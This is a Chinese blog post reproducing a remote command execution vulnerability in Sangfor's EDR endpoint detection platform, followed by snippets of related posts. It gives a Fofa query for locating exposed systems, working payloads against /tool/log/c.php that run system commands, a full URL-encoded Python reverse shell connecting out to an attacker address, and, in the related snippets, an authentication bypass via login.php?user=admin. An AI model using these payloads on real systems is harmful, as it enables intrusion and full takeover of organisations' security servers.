深信服终端检测响应平台EDR-远程命令执行漏洞

最新推荐文章于 2024-10-15 08:53:14 发布
最新推荐文章于 2024-10-15 08:53:14 发布
阅读量2.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/108141825
版权

1.漏洞描述

       深信服终端检测响应平台EDR存在远程命令执行漏洞,通过远程访问目标文件,造成远程命令执行,获取服务器完全控制权限。

2.资产查找

Fofa: app="深信服-终端检测响应平台EDR"

3.漏洞复现

1)访问深信服终端检测响应平台:https://xx.xx.xx.37/ui/login.php

2)远程访问目标文件:https://xx.xx.xx.37/tool/log/c.php

3)远程命令执行:https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id

https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami

4)反弹shell:

https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python%20-c%20%22import%20os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%27xx.xx.xx.105%27,1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%27/bin/bash%27,%27-i%27]);%22

 

chaojixiaojingang
关注
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 1032
深信服终端监测响应平台EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令
漏洞复现】深信服科技EDR平台存在任意用户登录漏洞
失心少年
09-08 799
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。fofa:title=“终端检测响应平台
深信服EDR远程命令执行
m0_48520508的博客
08-20 5799
0x00简介 深信服EDR属于终端安全产品部,是深信服公司在安全业务的战略级投入产品。终端安全部门负责下一代终端安全解决方案的产品研发,基于先进的AI技术和高效的安全领域经验, 建设深信服整体安全解决方案的端点响应能力,与云、网、端产品联动,构建面向未来、有效防御的闭环体系。 0x01利用方法 1.https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 2.linux读取文件 3.验证码绕过 // 校验验证码 if (
终端安全响应系统(EDR)与传统防病毒软件有何不同?
最新发布
qq_51301115的博客
10-15 753
终端安全响应系统(EDR)是传统终端安全产品在高级威胁检测响应方面的扩展和补充,通过威胁情报、攻防对抗、机器学习等方式,从主机、网络、用户、文件等维度来评估企业网络中存在的未知风险,以行为软件为核心,利用威胁情报,缩短威胁从发现到处置的时间,有效降低业务损失,增加可见性,提升整体安全能力。几十年来,企业一直渴望有一套防病毒套件,以期一举解决企业安全方面的挑战。但是,随着恶意软件威胁的复杂性和攻击范围的扩大,传统防病毒软件的缺点变得非常明显。为此,一些供应商重新思考了企业所面临的安全挑战。
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4607
终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
深信服EDR终端检测响应平台远程命令执行
Websec
08-18 4435
深信服edr远程命令执行复现 1、POC http:xxxxxx/tool/log/c.php?strip_slashes=system&host=id 2、FOFA语法 语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0 3、案例复现 漏洞页面: ...
【HW2020漏洞回顾】深信服EDR两大漏洞
wuguojie888的博客
08-20 9157
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
深信服edr终端检测响应平台(3.2.21)代码审计挖掘(RCE)1】涉及的知识点: 1. **代码审计**:代码审计是安全专家通过检查软件源代码或二进制代码,查找潜在的安全漏洞和错误的过程。在本案例中,审计的目标是...
CNVD-2020-46552 深信服EDR远程代码执行漏洞复现
afei001
01-19 1035
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同组成。2020年08月18日左右检测深信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
深信服 EDR终端检测响应平台 0day RCE 漏洞
Adminxe的博客
08-18 6962
0x01 前言 昨天睡得正香,突然公司售前就呼来电话,问某某edr出现啥问题了,然后我就给他讲了一遍,这个月太忙了,没时间写博客,今天继续来水一篇。 其次大哥来波最真挚的简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统...
深信服EDR任意用户登录漏洞复现
afei001
01-19 775
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 2020年HW行动时爆出的深信服EDR漏洞除了前面复现的CNVD-2020-46552深信服EDR远程代码执行漏洞,还有一个EDR任意用户登录漏洞,该漏洞没有CNVD编号。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 2.影响版本 ...
深信服EDR终端检测响应平台漏洞_2020HW
薄炙厚词的博客
08-21 1407
深信服edr 2020HW 0day 远程命令执行漏洞 远程代码执行漏洞 任意用户登陆漏洞 免密码登陆 Payload 使用浏览器访问 https://ip:prot/ui/login.php?user=任意字符 原文链接 远程命令执行 使用浏览器访问 https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami https://ip:prot/tool/log/c.php?strip_slashes=system&ho
深信服 EDR终端检测响应平台RCE漏洞
汗的博客
08-18 1586
payload https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami 改改host的参数就能rce fofa语法 title="终端检测响应平台" 处理方式 只能暂时下线,貌似问题还比较多,很多要重写 资产基本是国内的,别乱打了,,, ...
深信服 EDR 终端检测响应平台 -2020HW
战神/calmness的博客
09-25 812
目录 描述 影响 ​任意用户登录 RCE 【修复建议】 深信服 EDR 终端检测响应平台 0day RCE 漏洞 描述 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 影响 攻击者可以通过构造payload绕过登录判断,
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
weixin_46801402的博客
11-04 2982
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
深信服PHP,深信服终端检测响应平台 EDR 代码审计
weixin_30089411的博客
03-19 2546
今年 HW 深信服EDR 爆出了一些很低级的漏洞,也看到网上不少人再吐槽,国光也忍不住来分析复现看看。基本配置信息网上地下流传的深信服EDR ISO 文件实际上是 CentOS7 镜像,下面国光简单分享记录一下相关信息,然后面看到的朋友少走弯路。首先 ISO 安装的话,不要使用快速安装,直接挂载即可,相关的账号密码为:用户名密码rootedr@sangfor安装完成默认是静态 IP,得配置...
深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试
kelenwait的博客
06-24 1852
简介 深信服行为感知系统和终端检测响应平台EDR深信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行漏洞影响 深信服EDR 3.2.16 深信服EDR 3.2.17 深信服EDR 3.2.19 深信服 行为感知系统 漏洞复现 登录界面 c.php 远程命令执行漏洞 使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l
深信服EDR漏洞复现
黑白的博客
11-06 1801
声明 往后,复现的每个漏洞,我都会分享出来,希望可以通过这种方式,提高自己的能力,也希望大家可以一起学习,共同进步 漏洞描述 据说是有人把源码放网上了,不过看了看源码审计的骨偶成,也确实利用php反序列化,从而RCE 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC
深信服EDR(终端检测响应平台)任意用户登录POC
Websec
08-20 4573
深信服edr远程命令执行复现 1、POC payload: https://ip/ui/login.php?user=(随便写个可使用的账户即可) 例如: https://xxxxx/ui/login.php?user=admin 输入完毕以后即可使用admin权限直接登录平台 2、FOFA语法 语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值